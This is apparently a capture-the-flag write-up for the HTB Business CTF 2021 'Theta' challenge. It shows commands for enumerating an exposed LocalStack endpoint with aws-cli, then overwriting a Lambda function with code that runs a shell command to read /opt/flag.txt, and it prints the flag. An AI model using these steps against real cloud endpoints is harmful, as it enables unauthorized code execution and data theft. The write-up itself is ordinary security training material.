HTB Business CTF 2021 — Theta

Starting for this challenge with scanning the open port in the host. Using naabu, I get only port 22 and 4566 open.

scanning open port

After recon and get information from github, I guessed that port 4566 is using localstack. Then I try to access the port and get the result that only shows “status: running”.

default page

Check the endpoint /health to look up what services are running.

check all running services

I found 3 services running on localstack which are Lambda, logs, and cloudwatch. The first try, I only focused on the Lambda services. FYI, Lambda is a serverless compute service that can run code without managing the servers.

First, I enumerate the Lambda services using aws-cli to list all functions.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda list-functions

The name of the function in Lambda is “billing”.

list all functions

Then I try to enumerate more details in the function “billing”.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda get-function --function-name billing

The result shows the location file of the code in the Lambda function “billing”.

get function “billing”

Download the code, and I get file lambda_archive.zip and sample code used in the function “billing”.

lambda-function code

Then I run the function “billing” to view the result.

invoke the function “billing”

The first attempt, I tried to create a new function with the same code in lambda_archive.zip.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda create-function --function-name billing1 --publish --runtime python3.8 --zip-file fileb://lambda_archive.zip --handler test.handler --role arn:aws:iam::012351735804:role/billing_mgr

Unfortunately, I get errors when trying to create new function.

error when create a new function

The second attempt I tried to update the existing function with some modification in the output body.

lambda-function edited

Then zip the file into the lambda_archive.zip.

$ zip lambda_archive.zip lambda_function.py

After that I updated the Lambda function using this command.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda update-function-code --function-name billing --zip-file fileb://lambda_archive.zip

The result showing successfully updated the function with the new updated code.

successfully updated the function “billing”

Try to invoke / run the function “billing” to see the output.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda invoke --function-name billing log.txt; cat log.txt

Violaa! I get the output body successfully changed.

invoke function “billing” with new output

The last step is enumeration into the server host to find the flag, and I get the location flag in the directory /opt. Then, below are the final lambda_function.py to view the flag.

import json
import os
def lambda_handler(event, context):
    flag = os.popen("cat /opt/flag.txt").read()
    return {
        'message' : flag
    }

Running the Lambda function again, I get the flag!

$ aws --endpoint-url=http://10.129.173.216:4566 lambda invoke --function-name billing log.txt; cat log.txt

get the flag!

Flag : HTB{upd4t3s_4r3_n0_m0r3_s3cur3}